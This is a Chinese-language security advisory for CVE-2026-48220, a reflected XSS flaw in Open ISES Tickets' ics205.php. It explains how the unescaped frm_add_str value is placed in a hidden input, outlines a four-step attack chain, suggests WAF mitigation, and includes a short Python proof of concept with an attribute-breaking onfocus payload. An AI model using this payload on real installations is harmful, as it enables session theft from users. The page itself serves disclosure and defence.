CVE-2026-48220 CVSS 5.4 中危

CVE-2026-48220 Open ISES Tickets反射型XSS漏洞

披露日期: 2026-05-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-48220

漏洞类型

反射型跨站脚本 (Reflected XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Open ISES Tickets

漏洞概述

Open ISES Tickets在3.44.2之前的版本中存在反射型跨站脚本（XSS）漏洞。该漏洞位于ics205.php组件中，由于未对frm_add_str POST参数进行严格的输入清理，攻击者可注入任意JavaScript代码。攻击者需具备低权限账户，通过构造恶意请求将Payload嵌入HTML表单隐藏域。当受害者访问受影响页面时，恶意脚本将在其浏览器中执行，可能导致窃取会话令牌或执行未授权操作。

技术细节

该漏洞源于Open ISES Tickets在处理ics205.php页面的表单数据时缺乏有效的输出编码。具体来说，应用程序直接将用户通过POST请求提交的frm_add_str参数值嵌入到HTML响应的隐藏输入字段（<input type="hidden">）的value属性中，未进行任何转义处理。攻击者可以利用这一点，构造如" autofocus onfocus=alert(document.cookie) x="的Payload，闭合原有属性并注入恶意事件处理器。由于CVSS向量要求用户交互（UI:R），攻击者通常需要诱骗已认证的受害者点击特制的恶意链接。一旦受害者的浏览器解析了该响应，注入的JavaScript代码将在受害者的会话上下文中执行，从而绕过同源策略，允许攻击者窃取Session ID或执行其他恶意操作。

攻击链分析

STEP 1

1. 侦察与认证

攻击者确认目标使用的是Open ISES Tickets 3.44.2之前的版本，并获取一个低权限账户。

STEP 2

2. 构造恶意请求

攻击者针对ics205.php接口，在frm_add_str参数中注入包含JavaScript的Payload（如利用onfocus事件）。

STEP 3

3. 诱导受害者

攻击者诱导已登录的管理员或用户点击包含恶意Payload的链接或访问特定页面。

STEP 4

4. 执行攻击

受害者的浏览器在渲染页面时执行恶意脚本，由于是在受害者会话上下文中，可窃取Cookie或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
url = "http://target-ip/ics205.php"

# Attacker's session cookie (needs valid auth)
cookies = {
    "PHPSESSID": "attacker_session_id"
}

# Payload to exploit the hidden input XSS
# Closes the value attribute and adds an autofocus event
payload = '" autofocus onfocus=alert(document.cookie) x="'

data = {
    "frm_add_str": payload
}

response = requests.post(url, data=data, cookies=cookies)

if response.status_code == 200:
    print("Payload sent successfully.")
    print("Check the response HTML for the injected payload.")
else:
    print("Failed to send request.")

影响范围

Open ISES Tickets < 3.44.2

防御指南

临时缓解措施

建议立即部署Web应用防火墙（WAF）规则，以拦截针对ics205.php参数的恶意脚本注入尝试。同时，加强对用户的安全教育，避免点击不明链接，直到完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表